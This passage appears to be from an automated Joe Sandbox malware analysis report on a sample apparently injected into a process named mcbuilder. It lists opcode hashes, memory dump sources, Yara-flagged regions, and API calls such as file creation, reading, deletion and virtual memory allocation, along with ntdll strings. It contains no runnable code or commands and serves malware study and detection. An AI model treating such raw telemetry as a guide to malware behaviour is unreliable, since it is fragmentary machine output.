                                                • Instruction Fuzzy Hash: 6390023120150802D2C0B159440864A404997D1301F95C015B4066654DCA158B597BA1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dc4e6cabcdd5f6603c0438b6f57b76527fbed633a26013fb64c4042e5a2a7ae
                                                • Instruction ID: abbfad4ba4bd0a5926e8f25432b8c29a971c612e39e80d5cb5a37d603f040372
                                                • Opcode Fuzzy Hash: 9dc4e6cabcdd5f6603c0438b6f57b76527fbed633a26013fb64c4042e5a2a7ae
                                                • Instruction Fuzzy Hash: 5590023120554842D280B1594408A46405997D0305F55C011B40A5694DD6258E55BB61
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df6ad809aa6481d9b73cb2ac96bc2fe41e4fdeac59eba855f606ed950ed6ae4f
                                                • Instruction ID: 67b1cd01cdffa99f1cbd5483b7b78d7a8dd1828bd2662b85771e46ae3f4b8435
                                                • Opcode Fuzzy Hash: df6ad809aa6481d9b73cb2ac96bc2fe41e4fdeac59eba855f606ed950ed6ae4f
                                                • Instruction Fuzzy Hash: 2E9002A1201640924640F2598408B0A854997E0201B55C016F5095560CC52589519735
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac8922571743362e81a054566b180ab56600170f4a1e55186dd3ceec850b03e0
                                                • Instruction ID: cba5cde2b31de327049d2ae3c225d98ead888f12ff06ce022f8e430e382ce612
                                                • Opcode Fuzzy Hash: ac8922571743362e81a054566b180ab56600170f4a1e55186dd3ceec850b03e0
                                                • Instruction Fuzzy Hash: FD900435311500030345F55D070C50740CFD7D5351355C031F5057550CD731CD715731
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f528261cd5b561cb9d2abf95391533303ce3ae41f0ad60d351feb2e07db4c76
                                                • Instruction ID: 0ca346acbda112cf7ad2f240447a40b59918125c3f070a25eabdfd941d7bd698
                                                • Opcode Fuzzy Hash: 8f528261cd5b561cb9d2abf95391533303ce3ae41f0ad60d351feb2e07db4c76
                                                • Instruction Fuzzy Hash: 67900225221500020285F559060850B4489A7D6351395C015F5457590CC62189655721
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2608f80bd95b1b06e333ed20dabae543500500f21683c4f86754d9e6a20fabf
                                                • Instruction ID: 133b07500af07e13fe7b5d7b903a6b114ab90960dd9b97dd22d5d5e842c35e10
                                                • Opcode Fuzzy Hash: a2608f80bd95b1b06e333ed20dabae543500500f21683c4f86754d9e6a20fabf
                                                • Instruction Fuzzy Hash: 7F90023124150402D281B1594408606404DA7D0241F95C012B4465554EC6558B56AF61
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a398c2c2856168b3e3d390d5d22eeabd518fe17515f6a18ee18356ba1fe90dc
                                                • Instruction ID: e4d2f0468b64483df219975b6e2f29f0d84f9b962ea6c6f49270841ebce41c83
                                                • Opcode Fuzzy Hash: 9a398c2c2856168b3e3d390d5d22eeabd518fe17515f6a18ee18356ba1fe90dc
                                                • Instruction Fuzzy Hash: 1C900221242541525685F1594408507804AA7E0241795C012B5455950CC5269956DB21
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c81b33e91c799f21d8b709fcdda65623ba58ccc9cb7d974f051adf5e5fd4b5b
                                                • Instruction ID: 78331191ac51268fc41511ab424e4a4168ded7facc796d67bd2dd8d2f4c7056b
                                                • Opcode Fuzzy Hash: 5c81b33e91c799f21d8b709fcdda65623ba58ccc9cb7d974f051adf5e5fd4b5b
                                                • Instruction Fuzzy Hash: 5E90022921350002D2C0B159540C60A404997D1202F95D415B4056558CC91589695721
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3e07528b0641f250b29bf70825210075b26758f7fd397720d4e62083662978e
                                                • Instruction ID: 2f68990b492502659dcdd4630fadf6a1cc846f38f424c76efbdeadc318ed0d52
                                                • Opcode Fuzzy Hash: b3e07528b0641f250b29bf70825210075b26758f7fd397720d4e62083662978e
                                                • Instruction Fuzzy Hash: 0C90022120554442D240B559540CA06404997D0205F55D011B50A5595DC6358951A731
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67fc367191a28d0964ba38786e35b3e696e26ac8d15a55cbf0e0bb66c98e8b94
                                                • Instruction ID: 202a8edbd0d4c1155b168fe9fbc07fa2e6b9ef06f291f9e45340017d15b20a43
                                                • Opcode Fuzzy Hash: 67fc367191a28d0964ba38786e35b3e696e26ac8d15a55cbf0e0bb66c98e8b94
                                                • Instruction Fuzzy Hash: B790022130150003D280B159541C6068049E7E1301F55D011F4455554CD91589565722
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de49b67046c21e049640b5a0f0e61a9265553a1760e56a93f7b59e67b81939c7
                                                • Instruction ID: 17a95f6003e07bd070054751a87bb387a040067cf0348a2e775181a8a6c693b7
                                                • Opcode Fuzzy Hash: de49b67046c21e049640b5a0f0e61a9265553a1760e56a93f7b59e67b81939c7
                                                • Instruction Fuzzy Hash: 5790023120150402D240B599540C646404997E0301F55D011B9065555EC66589916731
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7ba9c0f3344874126010a5552cd2507a416072ea3a7e584a5144292ed5c7ecc
                                                • Instruction ID: afae3b89d87b67c078b5dcbe452a7343d9532c06af1b3288c0a6a86223cde00a
                                                • Opcode Fuzzy Hash: d7ba9c0f3344874126010a5552cd2507a416072ea3a7e584a5144292ed5c7ecc
                                                • Instruction Fuzzy Hash: B390022160550402D280B159541C706405997D0201F55D011B4065554DC6598B556BA1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 976c576f350a00a07f6e52fff7c530ab75b7735f1c3f5aaa9ee94ee7046996ae
                                                • Instruction ID: 810c0bf08632375a3842c682741c699e79962eecd7eb2a3fea054ba50ca56993
                                                • Opcode Fuzzy Hash: 976c576f350a00a07f6e52fff7c530ab75b7735f1c3f5aaa9ee94ee7046996ae
                                                • Instruction Fuzzy Hash: 2A90043130150403D340F15D550C707404DD7D0301F55D411F447555CDD757CD517731
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01974725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01974742
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01974655
                                                • ExecuteOptions, xrefs: 019746A0
                                                • Execute=1, xrefs: 01974713
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019746FC
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01974787
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019702E7
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019702BD
                                                • RTL: Re-Waiting, xrefs: 0197031E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                Strings
                                                • RTL: Resource at %p, xrefs: 01977B8E
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01977B7F
                                                • RTL: Re-Waiting, xrefs: 01977BAC
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 019772A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01977294
                                                • RTL: Re-Waiting, xrefs: 019772C1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 9b02d800b1511fe0a3af234af25fc0f418314d3ac14a2b07810cf058d42427dd
                                                • Instruction ID: dc3e82e5e0d1c5d895040124aba8a360587e1ed1e1d082fd7f118678f5d88f00
                                                • Opcode Fuzzy Hash: 9b02d800b1511fe0a3af234af25fc0f418314d3ac14a2b07810cf058d42427dd
                                                • Instruction Fuzzy Hash: A5316676A012199FDB60DF2DCD80BEE77FCEB54611F444559E94DE3240EB30AA458BA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 908bf257302396b3218af323367e089a7dab914124c348ee519f6e6f8b7ec30f
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: E791C571E0020E9BDB38DFEDC880EBEBBA9EF44321F54465AE95DA72D0D73099408711
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 326cbc29bf33c91e2d6c901017a36c17e770e982106ae82f5592467f72ec1106
                                                • Instruction ID: db3e46eaa13f994af1efb39de2915da75427ef74825184b57f5600adb04a0cf8
                                                • Opcode Fuzzy Hash: 326cbc29bf33c91e2d6c901017a36c17e770e982106ae82f5592467f72ec1106
                                                • Instruction Fuzzy Hash: C281F971D012699FDB35DB54CC44BEAB6B8AB48754F0045EAAA1DB7280D7709E84CFA0

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:4.2%
                                                Signature Coverage:1.5%
                                                Total number of Nodes:453
                                                Total number of Limit Nodes:72

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $v$&!$*-$2M$9h$=C$>M$G$J$NA$P~$R~$Ud$V$[*$[/$`$ht$oA$x$z$}$~*
                                                • API String ID: 0-2677354048
                                                • Opcode ID: 33a711aff24154eedd4bc35af0b9e32e56be7adcf51d6de459c951a7d642e33a
                                                • Instruction ID: fa1c964425a17240d214f693b37f628da05d3a9bfece2178217cbd08d724ef2c
                                                • Opcode Fuzzy Hash: 33a711aff24154eedd4bc35af0b9e32e56be7adcf51d6de459c951a7d642e33a
                                                • Instruction Fuzzy Hash: 9B029AB0D06628CBEF24CF84C998BDDBBB1BB45308F1085CAD1097B281D7B95A89DF55

                                                Control-flow Graph

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,?,?,030B4F6E,030A1B53), ref: 030A1BB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID: pBy$F
                                                • API String ID: 2340568224-845662772
                                                • Opcode ID: aefb0a52804cd24e01667cfc866b54672f56c1f8bfc09f4977e0b6c6423fdd24
                                                • Instruction ID: 08684419a725dcf8747d4020b3865d520258a994c3be89de3ef143bb62fd9656
                                                • Opcode Fuzzy Hash: aefb0a52804cd24e01667cfc866b54672f56c1f8bfc09f4977e0b6c6423fdd24
                                                • Instruction Fuzzy Hash: 13F193B5D01718ABDB24DFA4DC81FEEB7BDAF84304F04859AE509A6141E7706B48CFA1
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 030AC4F4
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 030AC52F
                                                • FindClose.KERNELBASE(?), ref: 030AC53A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 8220799a318cf72d7f1976648d233f155df50d4904d92ac36e635e4cc54ac0e3
                                                • Instruction ID: 963e761337152942741a7dafb2b88ed091df197025bbf366aa52ad65cae46253
                                                • Opcode Fuzzy Hash: 8220799a318cf72d7f1976648d233f155df50d4904d92ac36e635e4cc54ac0e3
                                                • Instruction Fuzzy Hash: 45319275A01748BBEB24DFA4DC85FFF77BC9F84744F144458F909AB180DA70AA858BA0
                                                APIs
                                                • NtCreateFile.NTDLL(?,CC7E5000,?,?,?,?,?,?,?,?,?), ref: 030B8A7B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 067dcf8ebb783fc9675187bededa98280aa01a3b00d029a7a3deeda5e6b87881
                                                • Instruction ID: 407eb3f5ae879f8954c81cc8e272a65ce5552b1e0df7831982973e8f87f0ad2a
                                                • Opcode Fuzzy Hash: 067dcf8ebb783fc9675187bededa98280aa01a3b00d029a7a3deeda5e6b87881
                                                • Instruction Fuzzy Hash: F331C1B5A01248AFDB54DF98D880EEEB7F9EF8C304F508209F919A7240D770A951CBA5
                                                APIs
                                                • NtReadFile.NTDLL(?,CC7E5000,?,?,?,?,?,?,?), ref: 030B8BD3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0a481d665e1630ad9e856e9ba73f7822fcb8cfe26c6d278b01e407281e883816
                                                • Instruction ID: 6f10b38074dce21d5cf09a18db41ca1081ad720a009cbf212a67744fe9943ca5
                                                • Opcode Fuzzy Hash: 0a481d665e1630ad9e856e9ba73f7822fcb8cfe26c6d278b01e407281e883816
                                                • Instruction Fuzzy Hash: 4B31E8B5A01208AFDB14DF98D880EEFB7F9EF88314F108209F919A7240D770A911CBA1
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(030A1C13,CC7E5000,030B78AF,00000000,00000004,00003000,?,?,?,?,?,030B78AF,030A1C13,030BAD01,030B78AF,6AAC5589), ref: 030B8EB5
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 1cc47cabd94037132196a0a443f07475a3b65fbe5146999252dba1adc8f4e692
                                                • Instruction ID: 5b5ba9ee287311ed4f2cd0d8c01fcbd50ff2a01f5ffa0b52c16496ac037d5e2a
                                                • Opcode Fuzzy Hash: 1cc47cabd94037132196a0a443f07475a3b65fbe5146999252dba1adc8f4e692
                                                • Instruction Fuzzy Hash: 26210AB5A01249AFDB14DF98DC41EEF77B9EF88704F004209F919AB244D774A911CBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 4f23b8e2131235d9aa7fea977af7136a21e554f3965beb0d504205d9eac58c8d
                                                • Instruction ID: 43bc508e9eab3cf90e042b1c529b729938e0c11eecb41a3622d0b43bf32bff19
                                                • Opcode Fuzzy Hash: 4f23b8e2131235d9aa7fea977af7136a21e554f3965beb0d504205d9eac58c8d
                                                • Instruction Fuzzy Hash: 99115E75A01245BEE620EAA8CC41FEB73ACEFC5714F50460AFA19AA280DB707905C7E5
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030B8CB4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                                                • Instruction ID: 68d58aeeb9e4dc6a45bb94db00f30b6d444d2650beda7d109e91a41bdd97712f
                                                • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                                                • Instruction Fuzzy Hash: D7E0463A210204BBE620FB69CC40FDB77ACDFC5724F008416FA1CAB241C670B90586E5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e6c7269c0f7fac60c9691fb40f0c2212b8c13bf73c9d4d8258bb7d25b5135ac0
                                                • Instruction ID: e61e6d16fbadc55011bb5715fc83a6be9c28cc3691d156ef5690d04c13110f1e
                                                • Opcode Fuzzy Hash: e6c7269c0f7fac60c9691fb40f0c2212b8c13bf73c9d4d8258bb7d25b5135ac0
                                                • Instruction Fuzzy Hash: B6900231605804269140B198488454A400597E1701B65C051E1428554C8B148A5A5362
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 81f2d12d008a69f0548a569668446a33530cac8df71882dec2d07c836491b950
                                                • Instruction ID: 3fab746a6ae9b0a8eeced934c71ae126d721565f06fb3c095936f1aa7d9895f3
                                                • Opcode Fuzzy Hash: 81f2d12d008a69f0548a569668446a33530cac8df71882dec2d07c836491b950
                                                • Instruction Fuzzy Hash: 73900261601504564140B198480440A600597E27013A5C155A1558560C87188959926A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9a11378d4e2e7502eb174b54ce65b24a5c5165cdc1f13311eb53d97a4051431d
                                                • Instruction ID: 86a4570279a72353317baa0a892c33aa9a9c6e00a3113082fc951fb34de5bc71
                                                • Opcode Fuzzy Hash: 9a11378d4e2e7502eb174b54ce65b24a5c5165cdc1f13311eb53d97a4051431d
                                                • Instruction Fuzzy Hash: 7990023160540C16D150B198441474A000587D1701F65C051A1028654D87558B5976A2
                                                APIs
                                                Memory Dump Source
